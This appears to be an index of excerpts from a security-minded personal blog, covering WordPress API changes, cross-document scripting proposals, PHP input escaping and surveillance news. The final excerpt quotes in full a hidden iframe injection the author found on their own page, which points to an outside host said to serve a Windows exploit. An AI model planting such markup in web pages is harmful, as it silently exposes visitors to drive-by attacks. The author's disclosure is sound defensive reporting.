To deal with the increasing number of compromised blogs, WordPress 2.6 will turn off XML-RPC and AtomPUB interfaces by default. MarsEdit developer Daniel Jalkut points out that the WordPress developers are ignoring the root cause: If your web service only provides one, first-class API through which all access flows, then you’ve only got one point [...]
Maybe JavaScript needs a same-origin rule for document.location. [ via Simon Willison ]
Via Cynthia, here’s a case of how “know your customer” laws and a bank’s indifference can derail a small business. Blue Moon Fiber Arts, a small West Cost company, runs a ‘sock club’ service: a yarn of the month club for knitters who want to work with cool, speciality yarns. The sock club grew popular. [...]
Yesterday, Douglas Crockford made a proposal for a cross-document scripting model; however, there’s already one in the WHAT WG working draft. I’ve been reading both specifications. My notes below. Cross Document Messages In the WHAT WG model, documents can implement postMessage(). A receiving document (in another window or iframe) receives a message event, and will [...]
[ via Bill Bumgarner ] Given the current Federal passion for grabbing every trace of data we generate, I predict making a HDD unreadable will become a crime.
Bruce Schneier: The NSA would like to remind everyone to call their mother’s [phone] this Sunday. They need to calibrate their system.
Adam, I don’t disagree that Apple might be bragging, but do you have to use the “she was asking for it” analogy? Neither kinky boots, nor security boasts excuse assault.
Checking on the status of a claim at my health insurer’s website, I tried signing in and got this helpful message: At least it’s one less thing I need to remember.
Brad Fitzpatrick endorses naming patches/installers with their digest value so you can search for patch “55820ee2f8c767a2833b21bd365e5753f50bd8ce”, download the file, compute the digest, and confirm you have the right files.
Cynthia passed along the Yarn Harlot’s airplane misadventure: a businessman seated next to her decided her knitting needles were a threat (even though Transportation Safety Agency rules allow them onboard.)
Adam: It’s easier to check ID than it is to make a judgment call. The consequences illustrated by a scene from a popular film.
Chris Shiflett posted the slides from a recent talk on PHP security. He set up three security challenges (see the source files.) He showed off something I had not noticed before. In htmlentities() you can declare an encoding. Shiflett has a straightforward approach to untainting user input: $html = array(); $html['variable'] = htmlentities($_GET['variable'],ENT_QUOTES,”utf-8″); /* Code [...]
Dori Smith reminds us there’s a shiny Easter Egg in her Serenity Dashboard Widget. Chris Shiflet finished his book on PHP security for O’Reilly. I’m getting a copy and so are the rest of my team. Ryan Campbell wrote a short piece on how to degrade Ajax so your site still works with JavaScript turned [...]
An analysis of the recent DNS poisoning attacks [ via meuon ] finds that the attackers’ motivation was gaming a pay-per-click search engine. A couple of days ago, a coworker asked me if I’ve been able to apply any of my economics training in my current profession. Well, for one thing, I could had told [...]
Tonight, when running a validation check, I discovered the following snippet inserted at the end of the page. <div style=”visibility: hidden; position: absolute; left: 1; top: 1″><iframe src=”http://re6.net/?s=1″ frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div></body> The hidden iFrame loads a Windows exploit. I have it removed, for the time being. I don’t know how [...]